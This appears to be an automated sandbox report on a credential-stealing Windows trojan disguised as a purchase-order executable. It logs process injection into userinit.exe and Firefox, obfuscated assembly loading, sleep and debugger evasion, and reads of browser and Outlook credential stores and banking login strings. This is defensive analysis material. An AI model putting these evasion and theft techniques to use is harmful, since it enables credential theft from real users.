            Source: userinit.exe, 00000008.00000002.3309629931.000000000391C000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000037FBC000.00000004.80000000.00040000.00000000.sdmp, PO-000001488.exe Binary or memory string: .csproj;Hadouken.Properties.Resources
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@13/8
            Source: C:\Users\user\Desktop\PO-000001488.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-000001488.exe.log
            Source: C:\Users\user\Desktop\PO-000001488.exe Mutant created: NULL
            Source: C:\Users\user\Desktop\PO-000001488.exe Mutant created: \Sessions\1\BaseNamedObjects\vPwtiQvy
            Source: C:\Windows\SysWOW64\userinit.exe File created: C:\Users\user\AppData\Local\Temp\A34E618M
            Source: PO-000001488.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PO-000001488.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\PO-000001488.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: userinit.exe, 00000008.00000003.2001252914.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.2000892094.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3307941539.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.2000839433.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.2001126306.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3307941539.0000000000D09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO-000001488.exe ReversingLabs: Detection: 65%
            Source: PO-000001488.exe String found in binary or memory: Bookmark-add
            Source: unknown Process created: C:\Users\user\Desktop\PO-000001488.exe "C:\Users\user\Desktop\PO-000001488.exe"
            Source: C:\Users\user\Desktop\PO-000001488.exe Process created: C:\Users\user\Desktop\PO-000001488.exe "C:\Users\user\Desktop\PO-000001488.exe"
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe Process created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"
            Source: C:\Windows\SysWOW64\userinit.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\PO-000001488.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\PO-000001488.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\userinit.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PO-000001488.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO-000001488.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MpfhURuSBZcuS.exe, 00000007.00000002.3307759780.00000000004BE000.00000002.00000001.01000000.0000000C.sdmp, MpfhURuSBZcuS.exe, 00000009.00000000.1835592215.00000000004BE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO-000001488.exe, 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1769373657.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1771308677.0000000003144000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO-000001488.exe, PO-000001488.exe, 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, userinit.exe, 00000008.00000003.1769373657.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1771308677.0000000003144000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: userinit.pdb source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000002.3308355650.0000000001168000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: userinit.pdbGCTL source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000002.3308355650.0000000001168000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: PO-000001488.exe, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO-000001488.exe.30d645c.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO-000001488.exe.7430000.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, UCmBvFDMba3C8pjQFg.cs.Net Code: RxSWYVP7ZR System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, UCmBvFDMba3C8pjQFg.cs.Net Code: RxSWYVP7ZR System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO-000001488.exe.30e6d08.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 8.2.userinit.exe.391cd14.2.raw.unpack, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.0.MpfhURuSBZcuS.exe.316cd14.1.raw.unpack, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.2.MpfhURuSBZcuS.exe.316cd14.1.raw.unpack, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 12.2.firefox.exe.37fbcd14.0.raw.unpack, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0041A87D push esp; retf 3_2_0041A87E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0040710D pushfd ; retf 3_2_0040710E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00423916 push esi; retf 3_2_0042392E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00423923 push esi; retf 3_2_0042392E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004031D0 push eax; ret 3_2_004031D2
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00418B76 push ebx; retf 3_2_00418B77
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0041A3C1 push edi; retf 3_2_0041A3C7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004143E3 push edi; iretd 3_2_004143EF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00417BE6 push es; ret 3_2_00417BE7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00411DA3 push edi; iretd 3_2_00411DAF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D09AD push ecx; mov dword ptr [esp], ecx3_2_014D09B6
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A525F7 push esp; retf 7_2_05A525FD
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A4EC52 push edi; iretd 7_2_05A4EC5E
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A43FBC pushfd ; retf 7_2_05A43FBD
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A5772C push esp; retf 7_2_05A5772D
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A4794E push esp; iretd 7_2_05A4795B
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A54A95 push es; ret 7_2_05A54A96
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A51292 push edi; iretd 7_2_05A5129E
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A55A25 push ebx; retf 7_2_05A55A26
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A57270 push edi; retf 7_2_05A57276
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033209AD push ecx; mov dword ptr [esp], ecx8_2_033209B6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC0743 push esi; retf 8_2_00AC075B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC0750 push esi; retf 8_2_00AC075B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC0962 push cs; retf 8_2_00AC0963
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB4A13 push es; ret 8_2_00AB4A14
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC0A5C push C67CA722h; ret 8_2_00AC0A61
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AAEBD0 push edi; iretd 8_2_00AAEBDC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB71EE push edi; retf 8_2_00AB71F4
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB1210 push edi; iretd 8_2_00AB121C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC15D5 push edi; ret 8_2_00AC15D9
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC152D push ecx; retf 8_2_00AC1576
            Source: PO-000001488.exeStatic PE information: section name: .text entropy: 7.8168604118663545
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: PO-000001488.exe PID: 2056, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 1580000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 50A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 7EB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 8EB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 9060000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: A060000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0151096E rdtsc 3_2_0151096E
            Source: C:\Users\user\Desktop\PO-000001488.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeWindow / User API: threadDelayed 566Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeWindow / User API: threadDelayed 9407Jump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\userinit.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\PO-000001488.exe TID: 2344Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 5040Thread sleep count: 566 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 5040Thread sleep time: -1132000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 5040Thread sleep count: 9407 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 5040Thread sleep time: -18814000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe TID: 4508Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe TID: 4508Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00ABC290 FindFirstFileW,FindNextFileW,FindClose,8_2_00ABC290
            Source: A34E618M.8.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: discord.comVMware20,11696494690f
            Source: A34E618M.8.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: A34E618M.8.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: A34E618M.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: A34E618M.8.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: MpfhURuSBZcuS.exe, 00000009.00000002.3308429692.000000000113F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
            Source: A34E618M.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: A34E618M.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: A34E618M.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: A34E618M.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 0000000C.00000002.2109377411.0000024CF7EBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
            Source: A34E618M.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: A34E618M.8.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: A34E618M.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: A34E618M.8.drBinary or memory string: global block list test formVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: A34E618M.8.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: A34E618M.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: A34E618M.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: A34E618M.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004173A3 LdrLoadDll,3_2_004173A3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01568158 mov eax, dword ptr fs:[00000030h]3_2_01568158
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01564144 mov eax, dword ptr fs:[00000030h]3_2_01564144
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01564144 mov ecx, dword ptr fs:[00000030h]3_2_01564144
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6154 mov eax, dword ptr fs:[00000030h]3_2_014D6154
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6154 mov eax, dword ptr fs:[00000030h]3_2_014D6154
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CC156 mov eax, dword ptr fs:[00000030h]3_2_014CC156
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01590115 mov eax, dword ptr fs:[00000030h]3_2_01590115
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157A118 mov ecx, dword ptr fs:[00000030h]3_2_0157A118
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157A118 mov eax, dword ptr fs:[00000030h]3_2_0157A118
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157A118 mov eax, dword ptr fs:[00000030h]3_2_0157A118
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157A118 mov eax, dword ptr fs:[00000030h]3_2_0157A118
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov ecx, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov ecx, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov ecx, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov ecx, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01500124 mov eax, dword ptr fs:[00000030h]3_2_01500124
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov eax, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov eax, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov eax, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov eax, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015961C3 mov eax, dword ptr fs:[00000030h]3_2_015961C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015961C3 mov eax, dword ptr fs:[00000030h]3_2_015961C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015001F8 mov eax, dword ptr fs:[00000030h]3_2_015001F8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A61E5 mov eax, dword ptr fs:[00000030h]3_2_015A61E5
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155019F mov eax, dword ptr fs:[00000030h]3_2_0155019F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155019F mov eax, dword ptr fs:[00000030h]3_2_0155019F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155019F mov eax, dword ptr fs:[00000030h]3_2_0155019F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155019F mov eax, dword ptr fs:[00000030h]3_2_0155019F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158C188 mov eax, dword ptr fs:[00000030h]3_2_0158C188
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158C188 mov eax, dword ptr fs:[00000030h]3_2_0158C188
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01510185 mov eax, dword ptr fs:[00000030h]3_2_01510185
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01574180 mov eax, dword ptr fs:[00000030h]3_2_01574180
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01574180 mov eax, dword ptr fs:[00000030h]3_2_01574180
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA197 mov eax, dword ptr fs:[00000030h]3_2_014CA197
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA197 mov eax, dword ptr fs:[00000030h]3_2_014CA197
